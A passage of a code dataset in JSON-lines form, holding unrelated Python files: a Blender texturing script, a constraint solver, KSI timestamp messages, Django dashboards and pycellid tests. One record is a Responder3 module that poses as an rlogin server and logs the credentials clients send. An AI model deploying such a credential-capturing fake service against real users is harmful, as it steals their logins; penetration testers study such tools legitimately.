1.0) - Lower value (e.g., 0.5) narrows down the sampling pool, 1.0 considers all tokens\n temperature=1.9, # (>0 to infinity) - Lower value (e.g., 0.7) makes output more focused and deterministic, higher values (e.g., 2.0) make it more random\n max_length=100, # (any positive integer) - Higher values allow for longer outputs, lower values restrict the output length\n min_length=2, # (any positive integer, typically <= max_length) - Higher values ensure longer outputs, lower values allow for shorter outputs\n num_return_sequences=1, # (any positive integer) - Higher values return more sequences, lower values return fewer\n no_repeat_ngram_size=0, # (0 to any positive integer) - Higher values prevent repetition of n-grams, lower values allow for more repetition\n early_stopping=False, # (True/False) - True stops generation once eos_token is reached, False allows generation past eos_token\n eos_token_id=tokenizer.eos_token_id, # Depends on the tokenizer; generally, it is set to the appropriate ID for the end-of-sequence token\n pad_token_id=tokenizer.pad_token_id, # Depends on the tokenizer; generally, it is set to the appropriate ID for the padding token\n repetition_penalty=1.0, # (>= 1.0) - Values > 1.0 discourage repetition, values < 1.0 encourage repetition (though it's unusual to use values < 1.0)\n length_penalty=2, # (>= 0.0) - Higher values (> 1.0) encourage longer sequences, values < 1.0 encourage shorter sequences\n)\nfor seq in sequences:\n print(f\"Result: {seq['generated_text']}\")\n","repo_name":"NoahBSchwartz/Promptimal","sub_path":"code/model_inference.py","file_name":"model_inference.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"25485786909","text":"#!BPY\n\n\"\"\"\nName: 'City Texturing'\nBlender: 245\nGroup: 'Import'\nTooltip: 'A Procedural Texturing of a city'\n\"\"\"\n\n__author__ = \"Flora\"\n__url__ = ()\n__version__ = \"0.1\"\n__bpydoc__ = \"Empty\"\n\nimport Universe\nfrom Blender import *\nfrom random import *\nimport os\n\nif os.name==\"nt\":\n\ttextures = Universe.dirpath+\"/textures/\"\nelse:\n\ttextures = Universe.dirpath+\"/textures//\"\nworldnum = 1\nlandnum = 1\nroadnum = 1\nbuildnum = 1 \n\n\n############ World material ###################\ntnum = abs(int(random() * worldnum) + 1)\ntid = \"Sky%d\"%tnum\nLibrary.Open(textures + tid + \".blend\")\nLibrary.Load(tid, 'World')\nScene.GetCurrent().world = World.Get(tid)\n\n############ Landscape material ###################\ntnum = abs(int(random() * landnum) + 3)\ntid = \"Landscape%d\"%tnum\nLibrary.Open(textures + tid + \".blend\")\nLibrary.Load(tid, 'Material')\nmatt = Material.Get(tid)\nmatt.spec = 0\nmatt.ref = 0.3\nmatt.amb = 0.09\nob = Object.Get(\"landscape\")\nme = ob.getData(False, True)\nme.materials = [matt]\t\nob.setMaterials([matt])\n\n###### Road material ############\ntnum = abs(int(random() * roadnum) + 2)\ntid = \"Road%d\"%tnum\nLibrary.Open(textures + tid + \".blend\")\nLibrary.Load(tid, 'Material')\nmatt = Material.Get(tid)\nmatt.spec = 0\nmatt.ref = 0.3\nmatt.amb = 0.09\nfor ob in Object.Get():\n\tif ob.getName().find(\"Road\")!=-1:\n\t\tme = ob.getData(False, True)\n\t\tme.materials = [matt]\t\n\t\tob.setMaterials([matt])\n\n###### Wall material ############\ntnum = abs(int(random() * buildnum) + 2)\ntid = \"Wall%d\"%tnum\nLibrary.Open(textures + tid + \".blend\")\nLibrary.Load(tid, 'Material')\nmatt = Material.Get(tid)\nmatt.spec = 0\nmatt.ref = 0.3\nmatt.amb = 0.09\nfor ob in Object.Get():\n\tif ob.getName().find(\"Building\")!=-1:\n\t\tme = ob.getData(False, True)\n\t\tme.materials = [matt]\t\n\t\tob.setMaterials([matt])\n\n\nfor m in Material.Get():\n\tm.setAmb(0.08)\n\tm.setSpec(0.0)","repo_name":"ftasse/CrowdSimulation","sub_path":"texturing.py","file_name":"texturing.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"7595710743","text":"from copy import deepcopy\nfrom random import choice, uniform, sample, choices\nfrom operator import methodcaller, attrgetter\nfrom collections import deque\n\n\nclass Variable:\n\n def __init__(self, domain: list, value=None, name = None) -> None:\n if type(domain) is not str:\n my_domain = domain\n else:\n my_domain = str(domain).split()[0]\n self.__domain = list(my_domain)\n self.__value = None\n self.__name = name\n if len(self.__domain) == 1:\n self.assign(self.__domain[0])\n if value is not None:\n self.assign(value)\n\n @classmethod\n def from_names_to_equal_domain(cls, names: set, domain: list, value=None) -> dict:\n name_to_variable_map = dict()\n for name in names:\n # if value is not None:\n # name_to_variable_map[name] = cls(domain, value)\n # else:\n name_to_variable_map[name] = cls(domain,value,name)\n return name_to_variable_map\n\n def __bool__(self) -> bool:\n return self.__value is not None\n\n def unique_assignment(self) -> bool:\n return len(self.__domain) == 1\n\n def __get_domain(self) -> list:\n return self.__domain\n def __set_domain(self, domain: set) -> None:\n self.__domain = domain\n domain = property(__get_domain, __set_domain)\n\n def __get_value(self):\n return self.__value\n value = property(__get_value)\n\n def __get_name(self):\n return self.__name\n name = property(__get_name)\n\n def assign(self, value):\n if self.__value is not None:\n raise OverAssignmentError(self)\n if value not in self.__domain:\n raise UncontainedValueError(self, value)\n self.__value = value\n\n def unassign(self):\n self.__value = None\n\n def __str__(self) -> str:\n name =\"\"\n if self.__name: name = str(self.__name)\n return name + \" (value: \" + str(self.value) + \"\\t domain: \" + str(self.__domain) + \")\"\n def __repr__(self) -> str:\n return self.__str__()\n\nclass VariableError(Exception):\n \"\"\" Base class for various Variable Errors. \"\"\"\n\nclass UncontainedValueError(VariableError):\n def __init__(self, variable: Variable, value):\n msg = \"Cannot assign variable: \" + str(variable) + \" with value: \" + str(value) + \\\n \" since it is not contained in variable's domain.\"\n super(UncontainedValueError, self).__init__(msg)\n\nclass OverAssignmentError(VariableError):\n def __init__(self, variable: Variable):\n msg = \"Over-assignment of an assigned variable: \" + str(variable) + \\\n \". variable must be unassigned before assignment.\"\n super(OverAssignmentError, self).__init__(msg)\n\n\nclass Constraint:\n def __init__(self, variables: list, evaluate_constraint):\n \"\"\" evaluate_constraint: a function tuple -> bool\"\"\"\n self.__variables = tuple(variables)\n\n self.__evaluate_constraint = evaluate_constraint\n self.__i_consistent_assignments = set()\n\n\n def __get_variables(self):\n return self.__variables\n variables = property(__get_variables)\n\n def __bool__(self) -> bool:\n # if self.__i_consistent_assignments:\n # return all(self.__variables) and self.is_consistent() and self.__is_i_consistent_assignment()\n return all(self.__variables) and self.is_consistent()\n\n __value_getter = attrgetter(\"value\")\n\n def is_consistent(self) -> bool:\n assigned_variables = []\n for var in self.__variables:\n if var:\n assigned_variables.append(var)\n if self.__i_consistent_assignments:\n return self.__evaluate_constraint(assigned_variables) and self.__is_i_consistent_assignment()\n return self.__evaluate_constraint(assigned_variables)\n\n def get_consistent_domain_values(self, variable: Variable) -> set:\n if variable not in self.__variables:\n raise UncontainedVariableError(self, variable)\n\n if variable.unique_assignment():\n return variable.domain\n\n original_value = variable.value\n variable.unassign()\n consistent_domain = set()\n for value in variable.domain:\n variable.assign(value)\n if self.is_consistent():\n consistent_domain.add(value)\n variable.unassign()\n\n if original_value is not None and variable.domain:\n variable.assign(original_value)\n return consistent_domain\n\n def update_i_consistent_assignments(self, i_consistent_assignments: set) -> None:\n if not i_consistent_assignments:\n self.__i_consistent_assignments.add(frozenset())\n for assignment in i_consistent_assignments:\n self.__i_consistent_assignments.add(frozenset(assignment))\n\n def __is_i_consistent_assignment(self) -> bool:\n all_values = map(Constraint.__value_getter, self.__variables)\n current_assignment = set(filter(None.__ne__, all_values))\n for assignment in self.__i_consistent_assignments:\n if assignment.issubset(current_assignment):\n return True\n return False\n\n def __str__(self) -> str:\n state = \"\\n constraint is completely assigned: \" + str(all(self.__variables)) + \\\n \". constraint is consistent: \" + str(self.is_consistent()) + \". constraint is satisfied: \" + \\\n str(bool(self)) + \". ]\\n\"\n return \"[ \" + \"\\n \".join(map(str, self.variables)) + state\n\nclass ConstraintError(Exception):\n \"\"\" Base class for various Constraint Errors. \"\"\"\nclass UncontainedVariableError(ConstraintError):\n def __init__(self, constraint: Constraint, variable: Variable):\n msg = \"Cannot return consistent domain of \" + str(variable) + \" since variable is not contained in\\n\" \\\n + str(constraint) + \"variables.\"\n super(UncontainedVariableError, self).__init__(msg)\n\n\nclass ConstraintProblem:\n\n def __init__(self, constraints):\n self.__constraints = tuple(constraints)\n self.__variables_to_constraints_map = _build_variables_to_constraints_mapping(self.__constraints)\n self.__constraint_graph = _build_constraint_graph_as_adjacency_list(self.__variables_to_constraints_map)\n\n def is_completely_assigned(self) -> bool:\n return all(self.__variables_to_constraints_map.keys())\n\n def is_consistently_assigned(self) -> bool:\n is_consistent_results = map(methodcaller(\"is_consistent\"), self.__constraints)\n return all(is_consistent_results)\n\n def get_variables(self):\n return self.__variables_to_constraints_map.keys()\n\n def get_unassigned_variables(self):\n unassigned_variables = []\n for var in self.__variables_to_constraints_map.keys():\n if not var:\n unassigned_variables.append(var)\n return unassigned_variables\n\n def get_neighbors(self, variable: Variable):\n return self.__constraint_graph[variable]\n\n def get_unassigned_neighbors(self, variable: Variable):\n unassigned_neighbors = []# filterfalse(None, self.__constraint_graph[variable])\n for const in self.__constraint_graph[variable]:\n if not const:\n unassigned_neighbors.append(const)\n return tuple(unassigned_neighbors)\n\n def get_constraints(self):\n return self.__constraints\n\n def get_unsatisfied_constraints(self):\n unsatisfied_constraints = [] #filterfalse(None, self.__constraints)\n for const in self.__constraints:\n if not const:\n unsatisfied_constraints.append(const)\n return frozenset(unsatisfied_constraints)\n\n def get_consistent_domain(self, variable: Variable) -> set:\n consistent_domains = map(methodcaller(\"get_consistent_domain_values\", variable),\n self.__variables_to_constraints_map[variable])\n return set.intersection(*consistent_domains)\n\n def __str__(self):\n state = \"\\n constraint_problem is completely assigned: \" + str(all(self.__variables_to_constraints_map)) + \\\n \". constraint_problem is consistent: \" + str(self.is_consistently_assigned()) + \\\n \". constraint_problem is satisfied: \" + str(all(self.__constraints)) + \". }\\n\"\n return \"{ \" + \"\\n \".join(map(str, self.__constraints)) + state\n\ndef _build_variables_to_constraints_mapping(constraints: list) -> dict:\n \"\"\" returns a dictionary var : list(constraints it is in) \"\"\"\n variables_to_constraints_map = dict() #dict(set)\n for const in constraints:\n for var in const.variables:\n try:\n variables_to_constraints_map[var].add(const)\n except:\n variables_to_constraints_map[var] = set()\n variables_to_constraints_map[var].add(const)\n return variables_to_constraints_map\n\ndef _build_constraint_graph_as_adjacency_list(variables_to_constraints_map: dict) -> dict:\n \"\"\" returns a dictionary var : set(variables that share constraints with var) \"\"\"\n constraints_graph = dict()\n for variable in variables_to_constraints_map:\n for constraint in variables_to_constraints_map[variable]:\n try:\n constraints_graph[variable].update(constraint.variables)\n except:\n constraints_graph[variable] = set()\n constraints_graph[variable].update(constraint.variables)\n constraints_graph[variable].discard(variable)\n return constraints_graph\n\n\ndef least_constraining_value(constraint_problem: ConstraintProblem, variable: Variable) -> list:\n unassigned_neighbors = constraint_problem.get_unassigned_neighbors(variable)\n\n def neighbors_consistent_domain_lengths(value) -> int:\n variable.assign(value)\n consistent_domain_lengths = map(lambda neighbor: len((constraint_problem.get_consistent_domain(neighbor))),\n unassigned_neighbors)\n variable.unassign()\n return sum(consistent_domain_lengths)\n\n return sorted(constraint_problem.get_consistent_domain(variable), key=neighbors_consistent_domain_lengths,\n reverse=True)\n\n\ndef minimum_remaining_values(constraint_problem: ConstraintProblem, variables = None):\n unassigned_variables = constraint_problem.get_unassigned_variables()\n min_variable = min(unassigned_variables, key=lambda var: len(constraint_problem.get_consistent_domain(var)))\n min_remaining_values = len(constraint_problem.get_consistent_domain(min_variable))\n min_variables = filter(lambda var: len(constraint_problem.get_consistent_domain(var)) == min_remaining_values,\n unassigned_variables)\n return list(min_variables)\n\ndef degree_heuristic(constraint_problem: ConstraintProblem, variables):\n if variables is not None: \n max_variable = max(variables, key=lambda var: len(constraint_problem.get_unassigned_neighbors(var)))\n return max_variable\n\n__actions_history = deque()\n\ndef classic_heuristic_backtracking_search(constraint_problem: ConstraintProblem, with_history: bool = False):\n __actions_history.clear()\n __classic_heuristic_backtrack(constraint_problem, with_history)\n if with_history:\n return __actions_history\n\ndef __classic_heuristic_backtrack(constraint_problem: ConstraintProblem, with_history: bool = False) -> bool:\n if constraint_problem.is_completely_assigned():\n if constraint_problem.is_consistently_assigned():\n return True\n return False\n unassigned_variables = constraint_problem.get_unassigned_variables()\n max_r = len(unassigned_variables)\n if max_r == 1: n_choice = 1\n else: n_choice = choice(range(1,max_r))\n selected_unassigned_vars = set(choices(unassigned_variables,k = n_choice))\n selected_variable = degree_heuristic(constraint_problem, selected_unassigned_vars)\n\n selected_domain = constraint_problem.get_consistent_domain(selected_variable)\n for value in selected_domain:\n selected_variable.assign(value)\n if with_history:\n __actions_history.append((selected_variable, value))\n\n if __classic_heuristic_backtrack(constraint_problem, with_history):\n return True\n\n selected_variable.unassign()\n if with_history:\n __actions_history.append((selected_variable, None))\n\n return False\n\n","repo_name":"NileyGF/Simulation-of-Recommendation-Systems","sub_path":"CSP.py","file_name":"CSP.py","file_ext":"py","file_size_in_byte":12394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"5227466942","text":"import json\nfrom datetime import datetime\nfrom enum import Enum, unique\nfrom base64 import standard_b64encode, standard_b64decode\nfrom dateutil.parser import parse\n\nfrom ksi.identifier import Identifier\nfrom ksi import IDENTIFIER_BASE_NAME\n\n\ndef bytes_to_base64_str(b: bytes) -> str:\n if not b:\n return \"None\"\n\n return str(standard_b64encode(b), encoding=\"ascii\")\n\n\nclass TimestampRequest:\n \"\"\"\n Convenience object for a timestamp request.\n\n Notation:\n x = hash(message || z_i)\n \"\"\"\n\n def __init__(self, x: bytes, ID_C: Identifier):\n \"\"\"\n Create an object timestamp request with the provided arguments.\n :param x: The hash of the request\n :type x: bytes\n :param ID_C: The client's identifier\n :type ID_C: Identifier\n \"\"\"\n assert isinstance(x, bytes) and isinstance(ID_C, Identifier)\n\n self.x = x\n self.ID_C = ID_C\n\n def __str__(self) -> str:\n \"\"\"\n :return: A string representation of the object\n :rtype: str\n \"\"\"\n return \"({x}, {idc})\".format(x=self.x.hex(), idc=str(self.ID_C))\n\n def to_json(self) -> str:\n \"\"\"\n :return: The JSON string representation of the object\n :rtype: str\n \"\"\"\n return json.dumps({'x': bytes_to_base64_str(self.x), 'ID_C': str(self.ID_C)})\n\n @staticmethod\n def from_json(json_obj: dict):\n \"\"\"\n :param json_obj: JSON representation of a TimestampRequest object\n :type json_obj: dict\n :return: A new TimestampRequest from the json parameter\n :rtype: TimestampRequest\n \"\"\"\n assert 'x' in json_obj and 'ID_C' in json_obj\n\n id = json_obj['ID_C'] # type: str\n if id.startswith(IDENTIFIER_BASE_NAME):\n # Removes IDENTIFIER_BASE_NAME from the beginning of the identifier string\n id = id[len(IDENTIFIER_BASE_NAME):]\n\n return TimestampRequest(standard_b64decode(json_obj['x']), Identifier(id))\n\n\n@unique\nclass KSIErrorCodes(Enum):\n NO_ERROR = 0\n UNKNOWN_CERTIFICATE = 1\n CERTIFICATE_EXPIRED = 2\n CERTIFICATE_TOO_EARLY = 3\n UNSPECIFIED_ERROR = 4\n\n def __str__(self):\n return self.name\n\n\nclass TimestampResponse:\n \"\"\"\n Convenience object for a timestamp response (this corresponds to S_t in the LaTeX notation of KSI).\n \"\"\"\n\n def __init__(self, x, ID_S: Identifier, ID_C: Identifier, t: datetime, status_code: KSIErrorCodes):\n \"\"\"\n Create an object timestamp response with the provided arguments.\n The signature is set to None.\n :param x: The hash of the request\n :param ID_S: The server's identifier\n :type ID_S: Identifier\n :param ID_C: The client's identifier\n :type ID_C: Identifier\n :param t: The time at which the request has been signed\n :type t: datetime\n :param status_code: A status code filled by the server to indicate errors or the lack thereof\n :type status_code: KSIErrorCodes\n \"\"\"\n assert isinstance(ID_S, Identifier) and isinstance(ID_C, Identifier)\n assert isinstance(t, datetime)\n assert isinstance(status_code, KSIErrorCodes)\n\n self.x = x\n self.ID_C = ID_C\n self.ID_S = ID_S\n self.t = t\n self.signature = None\n self.status_code = status_code\n\n def __str__(self) -> str:\n \"\"\"\n :return: A string representation of the object\n :rtype: str\n \"\"\"\n if isinstance(self.x, bytes):\n x_str = self.x.hex()\n else:\n x_str = self.x.hexdigest()\n\n return \"(x: {x}, ID_C: {idc})\\t=>\\t(status_code: {status_code}, ID_S: {ids}, t: {t}, signature: {sig})\".format(\n x=x_str,\n idc=str(self.ID_C),\n status_code=str(self.status_code),\n ids=str(self.ID_S),\n t=self.t.isoformat(),\n sig=self.signature)\n\n def to_json(self) -> str:\n \"\"\"\n :return: A JSON string representation of the object\n :rtype: str\n \"\"\"\n sig_str = \"None\"\n\n if self.signature:\n sig_str = str(self.signature, encoding=\"ascii\")\n\n return json.dumps({'status_code': str(self.status_code),\n 'x': bytes_to_base64_str(self.x),\n 'ID_C': str(self.ID_C),\n 'ID_S': str(self.ID_S),\n 't': self.t.isoformat(),\n 'signature': sig_str})\n\n @staticmethod\n def from_json_dict(json_obj: dict):\n \"\"\"\n :param json_obj: A JSON representation of the TimestampResponse object\n :type json_obj: dict\n :return: A new TimestampResponse built from the json_obj parameter\n :rtype: TimestampResponse\n \"\"\"\n assert 'status_code' in json_obj\n assert 'x' in json_obj\n assert 'ID_C' in json_obj\n assert 'ID_S' in json_obj\n assert 't' in json_obj\n assert 'signature' in json_obj\n\n status_code = KSIErrorCodes[json_obj['status_code']]\n x = standard_b64decode(json_obj['x'])\n ID_C = Identifier(json_obj['ID_C'][len(IDENTIFIER_BASE_NAME):])\n ID_S = Identifier(json_obj['ID_S'][len(IDENTIFIER_BASE_NAME):])\n t = parse(json_obj['t'])\n\n if json_obj['signature'] == \"None\":\n signature = None\n else:\n signature = bytes(json_obj['signature'], encoding=\"ascii\")\n\n res = TimestampResponse(x, ID_S, ID_C, t, status_code)\n res.signature = signature\n\n return res\n","repo_name":"alan-mushi/KSI","sub_path":"ksi/ksi_messages.py","file_name":"ksi_messages.py","file_ext":"py","file_size_in_byte":5569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"39218613505","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.http import Http404, HttpResponse, HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic.simple import direct_to_template\n\nfrom aplicaciones.models import ApplicationDocument\nfrom accounts.models import Applicant, Broker, Agency, Landlord\nfrom rentals.models import Rental\nfrom dashboard.forms import UnitAndRentalCreationForm, BrokerAdoptionForm\n\n@login_required\ndef applicant_dashboard(request, template='dashboard/applicant_dashboard.html'):\n applicant = Applicant.objects.get(user=request.user)\n application_document_list = ApplicationDocument.objects.filter(applicant=applicant)\n # avoiding generic.object_list because this view will ultimately contain more\n return direct_to_template(request, template, locals())\n\n@login_required\ndef broker_dashboard(request, template='dashboard/broker_dashboard.html'):\n broker = Broker.objects.get(user=request.user)\n unit_and_rental_creation_form = UnitAndRentalCreationForm()\n # broker_rental_list is the list of rentals the broker has added himself.\n # this is independent of the set that his agency represents\n # the agency can't see broker.rentals, but the agency can see\n # ANY application document that his brokers have started, even outside\n # the agency/ is this a problem?\n # agency rental list is the list that his affiliated agency represents\n # its assumed he has access to all of the agency represented rentals\n\n #broker.agency.rentals.add(rental)\n if request.method == \"POST\":\n if request.POST.has_key(\"address1\") and request.POST.has_key(\"rent_amount\"):\n unit_and_rental_creation_form = UnitAndRentalCreationForm(request.POST)\n if unit_and_rental_creation_form.is_valid():\n _cleaned_data = unit_and_rental_creation_form.cleaned_data\n rent_amount = _cleaned_data['rent_amount']\n start_date = _cleaned_data['start_date']\n landlord = _cleaned_data['landlord']\n # TODO: save method only saves the Unit (non multiple inheritance)\n # see models\n unit = unit_and_rental_creation_form.save()\n rental = Rental(unit=unit, creator=request.user,\n rent_amount=rent_amount, start_date=start_date)\n if landlord:\n rental.landlord = landlord\n rental.save()\n if broker.agency:\n broker.agency.rentals.add(rental)\n messages.info(request, \"You successfully added a rental unit for your agency\")\n else:\n broker.rentals.add(rental)\n messages.info(request, \"You are not currently affiliated with an agency on Leasely.com. This rental unit has been added to your personal broker dashboard to track.\")\n HttpResponseRedirect(reverse(\"broker_dashboard\"))\n\n application_document_list = ApplicationDocument.objects.filter(broker=broker)\n return direct_to_template(request, template, locals())\n\n@login_required\ndef agency_dashboard(request, template='dashboard/agency_dashboard.html'):\n agency = Agency.objects.get(user=request.user)\n broker_adoption_form = BrokerAdoptionForm()\n\n if request.method == \"POST\":\n # broker adoption form\n if request.POST.has_key(\"broker\"):\n broker_adoption_form = BrokerAdoptionForm(request.POST)\n if broker_adoption_form.is_valid():\n broker = broker_adoption_form.cleaned_data['broker']\n broker.agency = agency\n broker.save()\n messages.info(request, \"broker %s was successfully added to your agency roster\" % broker)\n\n broker_list = Broker.objects.filter(agency=agency)\n rental_list = agency.rentals.all()\n application_document_list = ApplicationDocument.objects.filter(rental__in=rental_list)\n return direct_to_template(request, template, locals())\n\n@login_required\ndef landlord_dashboard(request, template='dashboard/landlord_dashboard.html'):\n landlord = Landlord.objects.get(user=request.user)\n rentals = Rental.objects.filter(landlord=landlord)\n application_document_list = ApplicationDocument.objects.filter(rental__in=rentals)\n return direct_to_template(request, template, locals())\n\n@login_required\ndef dashboard(request, view=None):\n \"\"\"Redirect to the user's specific dashboard.\n\n The site is designed so that each user has a default user view.\n If the user intends to use the site primarily as a broker, its possible\n that the user will never even know that the other functionality exists.\n\n Users technically can act in all possible user capacities and thus can also\n set settings as each user type (applicant, broker, agency, landlord). This\n plain, unspecified \"dashboard\" view redirects them to their default view.\n\n We may consider changing this to whatever user_type view they were on last.\n \"\"\"\n view = request.user.get_profile().default_view\n REDIRECT = {\n \"Applicant\": \"applicant_dashboard\",\n \"Broker\": \"broker_dashboard\",\n \"Agency\": \"agency_dashboard\",\n \"Landlord\": \"landlord_dashboard\",\n }\n return HttpResponseRedirect(reverse(REDIRECT[view]))\n\n","repo_name":"ezl/ezl_alpha","sub_path":"apps/dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"37445871402","text":"import enum\nimport logging\nimport asyncio\n\nfrom responder3.core.logging.logger import *\nfrom responder3.core.asyncio_helpers import R3ConnectionClosed\nfrom responder3.core.commons import *\nfrom responder3.protocols.RLOGIN import *\nfrom responder3.core.servertemplate import ResponderServer, ResponderServerSession\n\n\n\n\nclass RLOGINSession(ResponderServerSession):\n\tdef __init__(self, connection, log_queue):\n\t\tResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)\n\t\tself.current_state = RloginSessionState.BEFORE_AUTH\n\nclass RLOGIN(ResponderServer):\n\tdef init(self):\n\t\tpass\n\n\tasync def send_data(self, data):\n\t\tself.cwriter.write(data)\n\t\tawait self.cwriter.drain()\n\n\t@r3trafficlogexception\n\tasync def run(self):\n\t\t# main loop\n\t\twhile not self.shutdown_evt.is_set():\n\t\t\tif self.session.current_state == RloginSessionState.BEFORE_AUTH:\n\t\t\t\ttry:\n\t\t\t\t\tresult = await asyncio.gather(*[AuthenticationMessage.from_streamreader(self.creader, timeout=None)], return_exceptions=True)\n\n\t\t\t\texcept asyncio.CancelledError as e:\n\t\t\t\t\traise e\n\t\t\t\tif isinstance(result[0], R3ConnectionClosed):\n\t\t\t\t\treturn\n\t\t\t\telif isinstance(result[0], Exception):\n\t\t\t\t\traise result[0]\n\t\t\t\telse:\n\t\t\t\t\tauth_msg = result[0]\n\n\t\t\t\tawait self.logger.credential(auth_msg.to_credential())\n\n\t\t\t\t#no authenticator for now\n\t\t\t\treturn\n\n\t\t\t\t# In case of succsess, send a null byte and set current_state\n\t\t\t\t#self.session.current_state = RloginSessionState.AUTHENTICATED\n\t\t\t\t#await self.send_data(b'\\x00')\n\t\t\t\n\t\t\telif self.session.current_state == RloginSessionState.AUTHENTICATED:\n\t\t\t\t#raise NotImplementedError\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\traise Exception('Unknown RLOGIN state!')\n","repo_name":"skelsec/Responder3","sub_path":"responder3/servers/RLOGIN.py","file_name":"RLOGIN.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"33"} +{"seq_id":"38925879632","text":"f = open('data.bin', 'wb')\ntxt = bytes('Python Programming ','utf-8')\ntxt += bytes('hello','utf-8')\nf.write(txt)\nf.close()\n\nprint(\"อ่านข้อมูลจาก binary file \\n\")\nf = open('data','rb')\nprint(f.read())\nf.close()","repo_name":"waranyapasompan/python02","sub_path":"lab7-1.py","file_name":"lab7-1.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"38196478159","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport random\n\nimport numpy as np\n\nimport pandas as pd\n\nimport pycellid.io as ld\n\nimport pytest as pt\n\n# =============================================================================\n# Parameter & fixtures\n# =============================================================================\n\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nbase = os.path.dirname(ROOT_DIR)\n\n# =============================================================================\n# Test read, parse: Folders, File names\n# =============================================================================\n\n\n@pt.mark.xfail(raises=FileNotFoundError)\ndef test_make_df_file_path_fails(invalid_f_name_fail):\n ld.make_df(invalid_f_name_fail)\n\n\n@pt.mark.xfail(raises=FileNotFoundError)\ndef test_make_df_pos_file_path_fails():\n valid_f = os.path.join(base, \"tests\", \"pydata\", \"lugar01\", \"out_all\")\n ld.make_df(valid_f)\n\n\n@pt.mark.xfail(raises=FileNotFoundError)\ndef test_make_df_file_pos_fails(invalid_pos_fail):\n ld.make_df(invalid_pos_fail)\n\n\ndef test_make_df_file():\n file = os.path.join(base, \"tests\", \"pydata\", \"Position2e2+2\", \"out_all\")\n df = ld.make_df(file)\n assert df[\"pos\"].unique() == 202\n\n\ndef test_merge_tables_fnd():\n f = np.random.choice([\"P\", \"p\", \"Pos\", \"Position\", \"Posicion\"])\n n = np.random.randint(5, 200)\n fnd = os.path.join(base, \"samples_cellid\", f\"{f}{n}\")\n with pt.raises(FileExistsError):\n ld.merge_tables(fnd)\n\n\ndef test_merge_tables_fnd_file():\n n = np.random.randint(1, 4)\n folder = os.path.join(base, \"samples_cellid\", f\"P{n}\")\n data_table = random.choice(\n [\"out\", \"out_alll\", \"Pos\", \"tablas\", \"datos.txt\"]\n )\n m_data = random.choice([\"map\", \"mapeo\", \"m\", \"seguimiento\"])\n with pt.raises(FileExistsError):\n ld.merge_tables(path=folder, n_data=data_table, n_mdata=m_data)\n\n\ndef test_read_mapping_file(create_mapping_file):\n df1 = ld.read_df(create_mapping_file)\n df2 = pd.DataFrame(\n {\n \"flag\": [0, 1, 2, 3],\n \"fluor\": [\"BF_Pos02\", \"YFP_Pos02\", \"CFP_Pos02\", \"RFP_Pos02\"],\n }\n )\n assert np.array_equal(df1.values, df2.values)\n\n\ndef test_read_out_all_file(create_out_all_file):\n rs = np.random.RandomState(np.random.MT19937(np.random.SeedSequence(1234)))\n df1 = ld.read_df(create_out_all_file)\n df2 = pd.DataFrame(\n {\n \"area\": np.linspace(200, 1000, 300, dtype=int),\n \"f_nuc\": np.linspace(50, 500, 300, dtype=int),\n \"f_tot\": np.linspace(50, 500, 300, dtype=int),\n \"f_vac\": np.linspace(50, 500, 300, dtype=int),\n \"flag\": rs.randint(0, 4, 300, dtype=int),\n \"cellID\": np.linspace(100, 400, 300, endpoint=True, dtype=int),\n \"ucid\": np.linspace(100, 400, 300, endpoint=True, dtype=int)\n + 100000000000,\n \"t_frame\": rs.randint(1, 13, 300, dtype=int),\n \"pos\": np.ones(300, dtype=int),\n }\n )\n assert np.array_equal(df1.values, df2.values)\n\n\n# =============================================================================\n# test crated values: col_names, UCID\n# =============================================================================\n\n\ndef test_make_df_c_names(rand_make_df):\n for name in rand_make_df.columns:\n assert \".\" not in name\n assert \" \" not in name[0]\n assert \" \" not in name[-1]\n\n\ndef test_fluor_col(create_out_all_file, create_mapping_file):\n ch = [\"BF\", \"YFP\", \"CFP\", \"RFP\"]\n var = [\"f_nuc\", \"f_tot\", \"f_vac\"]\n var_ch = [f\"{v}_{c.lower()}\" for v in var for c in ch]\n\n df_out_all = ld.read_df(create_out_all_file)\n df_mapp = ld.read_df(create_mapping_file)\n\n df = ld._make_cols_chan(df_out_all, df_mapp)\n\n for name in df.columns:\n if name.startswith(\"f_\"):\n assert name in var_ch\n\n\ndef test_make_df_ucid(rand_make_df):\n ucid = rand_make_df.ucid\n pos = rand_make_df.pos\n cellid = rand_make_df.cellID\n assert np.array_equal(ucid, pos * 100000000000 + cellid)\n\n\n# =============================================================================\n# test data integrity\n# =============================================================================\n\n\ndef test_make_df_values():\n p_out_all = os.path.join(base, \"samples_cellid\", \"Position01\", \"out_all\")\n df1 = ld.make_df(p_out_all)\n df1 = df1.drop([\"ucid\", \"pos\"], axis=1)\n df2 = pd.read_table(p_out_all)\n assert np.array_equal(df1.values, df2.values)\n\n\n@pt.mark.parametrize(\n \"string,expected\",\n [\n (\"BF_Position01_time01.tif.out.tif\", \"bf\"),\n (\"bF_Position01_t01.tif.out.tif\", \"bf\"),\n (\"bf_Position01_tiemp01.tif.out.tif\", \"bf\"),\n (\"dsf/BF_Position01_time01.tif.out.tif\", \"bf\"),\n (\"d34sf/BF_Position01_time01.tif.out.tif\", \"bf\"),\n (\"dsf/BF-Position01_time01.tif.out.tif\", \"bf\"),\n (\"d34sf/BF-Position01_time01.tif.out.tif\", \"bf\"),\n (\"RFP_Position01_time01.tif.out.tif\", 